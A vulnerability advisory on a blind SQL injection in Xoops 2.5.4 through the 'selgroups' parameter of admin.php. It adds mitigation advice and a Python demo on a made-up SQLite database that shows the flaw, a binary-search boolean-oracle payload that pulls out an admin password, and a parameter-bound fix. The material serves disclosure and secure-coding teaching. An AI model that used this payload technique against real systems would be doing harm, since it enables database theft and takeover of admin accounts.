Vendor: Xoops
By: blkhtc0rp
CVSS: 8.8 (HIGH)
Vulnerability Type: Blind SQL Injection
CWE: 89
Product Name: Xoops
Affected Version From: 2.5.2004
Affected Version To: 2.5.2004
Patch Exists: YES
Related CWE: N/A
CPE: a:xoops:xoops
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: FreeBSD 8 and Debian Squeeze
Year: 2011
Xoops 2.5.4 Blind SQL Injection
Xoops 2.5.4 is vulnerable to blind SQL injection. The injection point is reached through the 'admin.php' script: the 'fct' parameter selects the administrative function to run, and the 'selgroups' parameter handled by that function is placed into a SQL query without adequate validation. Because the server's response differs depending on whether an injected condition is true or false, an attacker can recover database contents one bit at a time and use the extracted data to gain access to the administration menu. Since the entry point sits under admin.php, exploitation requires whatever level of access that script grants to the attacker's session.
Mitigation:
Upgrade to a patched release of Xoops (a vendor patch exists). As an interim measure, restrict network access to admin.php and log any request to it whose 'selgroups' value contains characters beyond the expected comma-separated group identifiers.
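The following Python program is an added illustration of the technique described above and of the code-level fix behind the mitigation; it is not the original exploit and not Xoops code. It builds a constructed in-memory SQLite database (tables cms_groups and cms_users, an invented admin row), reproduces the CWE-89 anti-pattern in which a group-selection value like 'selgroups' is pasted into an IN list, then shows how a boolean oracle recovers a secret character by character with binary search, and how the hardened handler (integer validation plus bound parameters) leaves the oracle with nothing to learn. The query shape, table names and secret value are all assumptions for the demonstration.

```python
import sqlite3


def build_db():
    """Constructed in-memory stand-in for a CMS database (not Xoops' schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE cms_groups (groupid INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany(
        "INSERT INTO cms_groups VALUES (?, ?)",
        [(1, "Webmasters"), (2, "Registered Users"), (3, "Anonymous")],
    )
    conn.execute("CREATE TABLE cms_users (uid INTEGER PRIMARY KEY, uname TEXT, pass TEXT)")
    # Constructed credential row; this is the value the blind attack recovers below.
    conn.execute("INSERT INTO cms_users VALUES (1, 'admin', 'secret42')")
    conn.commit()
    return conn


def vulnerable_select_groups(conn, selgroups):
    """The CWE-89 anti-pattern: the request value is pasted straight into the IN list."""
    sql = "SELECT name FROM cms_groups WHERE groupid IN (%s) ORDER BY groupid" % selgroups
    return [row[0] for row in conn.execute(sql)]


def hardened_select_groups(conn, selgroups):
    """Fix: enforce the expected shape (comma-separated integers) and bind parameters."""
    ids = []
    for item in selgroups.split(","):
        item = item.strip()
        if not item.isdigit():
            raise ValueError("selgroups must be a comma-separated list of integers")
        ids.append(int(item))
    placeholders = ",".join("?" for _ in ids)
    sql = "SELECT name FROM cms_groups WHERE groupid IN (%s) ORDER BY groupid" % placeholders
    return [row[0] for row in conn.execute(sql, ids)]


class BlindOracle:
    """Boolean oracle: the page lists group 1 only if the injected condition is true."""

    def __init__(self, conn, handler):
        self.conn = conn
        self.handler = handler
        self.queries = 0

    def holds(self, condition):
        self.queries += 1
        # Turns "groupid IN (1)" into "groupid IN (1 AND (<condition>))": the list
        # evaluates to 1 when the condition holds and to 0 or NULL otherwise.
        payload = "1 AND (%s)" % condition
        try:
            return len(self.handler(self.conn, payload)) > 0
        except ValueError:
            # The hardened handler rejects the payload outright; the response no
            # longer depends on the condition, so the attacker learns nothing.
            return False


def extract_secret(conn, handler, max_len=32):
    """Recover the admin password one character at a time via binary search.

    Assumes printable ASCII (code points below 128): each character costs at
    most 7 oracle queries instead of up to 95 linear guesses.
    """
    oracle = BlindOracle(conn, handler)
    target = "(SELECT pass FROM cms_users WHERE uname = 'admin')"
    secret = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            # Past the end of the string substr() yields '' and unicode('') is NULL,
            # so every comparison is false and the search converges on 0.
            if oracle.holds("unicode(substr(%s, %d, 1)) > %d" % (target, pos, mid)):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        secret += chr(lo)
    return secret


if __name__ == "__main__":
    db = build_db()
    print("normal request:", hardened_select_groups(db, "1,3"))
    print("against vulnerable handler:", repr(extract_secret(db, vulnerable_select_groups)))
    print("against hardened handler:", repr(extract_secret(db, hardened_select_groups)))
```

The oracle never sees the secret directly; it only observes whether group 1 appears in the result, which is exactly the side channel a blind injection exploits. Note that the hardened handler does not merely escape quotes: it rejects anything that is not an integer list before the value gets near the query, so the injected condition can never reach the database.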